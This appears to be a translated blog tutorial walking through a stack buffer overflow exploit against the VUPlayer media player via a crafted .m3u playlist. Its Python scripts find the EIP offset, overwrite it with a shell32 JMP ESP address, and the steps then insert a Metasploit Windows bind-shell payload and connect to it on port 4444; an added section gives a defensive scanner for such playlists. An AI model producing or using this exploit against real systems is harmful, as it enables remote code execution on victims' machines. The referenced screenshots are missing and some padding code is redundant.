BUFFER OVERFLOW EXPLOIT VUPLAYER

OK, before we get into the first topic of discussion, let's get to know the menus in VUPlayer. In the File menu there are the items shown below:

Next, the View menu, as shown below:

Next, the Visual menu, as shown below:

OK, now we try to feed our fuzzer in through the Visual menu. As the picture shows, once we go to the place where the VUPlayer application is installed we can see which menu lets us enter our fuzzer; the details are in the picture below.
I had previously tried to get my fuzzer into the Visual menu in the formats offered there, etc., but the results were not satisfactory; one of the entries in the Visual menu even went missing,,, hahahahaha

Well, now I'll try to make the fuzzer as below:

#!/usr/bin/python
# Write a playlist made of 50000 'A' (0x41) bytes to crash.m3u
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x41" * 50000
cimon.write(buffer)
cimon.close()



Then we open VUPlayer and select Open Playlist.

Then we type the command "python data.py" at the console, and in VUPlayer browse to the folder where the fuzzer we made saved its ".m3u" file and open it.




See what happens when we open the file "crash.m3u": if VUPlayer disappears, it means the VUPlayer application has been hit by the fuzzer we made.

Then we open OllyDbg, run VUPlayer under it, and see the result: where the 'A's we entered have ended up.

The picture above shows that the value of the EIP register is affected.




#The next step: we open a new console and type the commands

     #cd /pentest/exploits/framework/tools (enter)
     #./pattern_create.rb 50000 > string_pattern.txt (enter)
     #ls
     #kate string_pattern.txt (will appear as below)




#After string_pattern.txt appears, we copy its contents into the fuzzer script, like this:


#When that is done, open OllyDbg as in the previous step and see what happens.
#Visibly, the EIP register value has changed.


#The next step is to find out at which byte the EIP and ESP register values are affected; to know that, we type the command shown below.


#From the above picture we see that the values stored in EIP and ESP are at bytes 1012 and 1016.

#Next step: we edit the fuzzer.

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012          # 1012 filler bytes up to the EIP offset found above
buffer+="\xDE\xFA\xDA\xBE"    # the 4 bytes that land in EIP (read back as BEDAFADE)
cimon.write(buffer)
cimon.close()

 

#After that, run OllyDbg and see what happens.



#We see above that the value of the EIP register has changed to BEDAFADE.




#The next step is to try writing at ESP; to do that we first edit the fuzzer, and we will try to write the value 90 there.

#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\xDE\xFA\xDA\xBE"
# pad with 0x90 up to the ESP offset of 1016 found above
# (with 1016 bytes already written these two lines add nothing)
buffer+="\x90" * (1012-len(buffer))
buffer+="\x90" * (1016-len(buffer))
cimon.write(buffer)
cimon.close()

  
#To see the result, follow the same steps as described above.


#The next step is to find a memory address that holds a JMP ESP instruction. To look for JMP ESP, run the application under OllyDbg, and on the View menu select Executable modules.
#Next select shell32, press Ctrl+F, and type JMP ESP.






#Next, edit the fuzzer.



#!/usr/bin/python
filename='crash.m3u'
cimon=open(filename,'w')
buffer="\x90" * 1012
buffer+="\x1E\xFA\xB3\x7C"    # address of the JMP ESP found in shell32, little-endian
buffer+="\x90" * (1012-len(buffer))
buffer+="\x90" * (1016-len(buffer))
cimon.write(buffer)
cimon.close()
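From the defender's side, the playlist built above has a recognisable shape: one entry of 1012 filler bytes followed by a return address, mostly non-printable. Below is an added example (not code from the original post) that flags .m3u entries with that shape; the sample playlists are constructed here, and the 1024-byte sanity limit on an entry is an assumption.

```python
# Added example: flag .m3u playlist entries shaped like the overflow file built above.
EIP_OFFSET = 1012        # byte at which the post finds EIP overwritten
SANE_ENTRY_LEN = 1024    # assumption: a real path or URL entry is far shorter than this

def scan_m3u(data: bytes) -> list:
    """Return one finding per suspicious playlist entry (empty list if clean)."""
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line or line.startswith(b"#"):
            continue  # blank lines and #EXTM3U / #EXTINF directives are normal
        reasons = []
        if len(line) > SANE_ENTRY_LEN:
            reasons.append("entry longer than any sane path")
        nonprint = sum(1 for b in line if b < 0x20 or b > 0x7E)
        if nonprint:
            reasons.append("%d non-printable bytes" % nonprint)
        finding = {"line": lineno, "length": len(line), "reasons": reasons}
        if len(line) >= EIP_OFFSET + 4:
            # the four bytes that would land in the saved return address slot
            finding["eip_bytes"] = line[EIP_OFFSET:EIP_OFFSET + 4].hex()
            if line[:EIP_OFFSET].count(b"\x90") > EIP_OFFSET * 9 // 10:
                reasons.append("NOP sled ahead of the return address slot")
        if reasons:
            findings.append(finding)
    return findings

# Constructed samples, not files from the post: the playlist as the post builds it
# (1012 NOPs then the JMP ESP address), and a benign playlist.
SAMPLE_EXPLOIT = b"\x90" * 1012 + b"\x1E\xFA\xB3\x7C"
SAMPLE_BENIGN = b"#EXTM3U\n#EXTINF:200,Song\nC:\\Music\\song.mp3\nhttp://example.com/a.mp3\n"

if __name__ == "__main__":
    for name, sample in (("exploit", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        print(name, scan_m3u(sample))
```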

#Run OllyDbg and see the result.


#Now we look for the payload, as shown below.

#Next open a web browser and enter the address 127.0.0.1:55555.


#Next select Payloads and select win32 under Filter modules.


#Select Windows Bind Shell and follow the steps below.



#Next, copy the payload into the fuzzer.
#Then type the command telnet 192.168.43.3 4444 and run OllyDbg to see whether it succeeded or not.



                                     "<GOOD LUCK AND TRY HARDER>"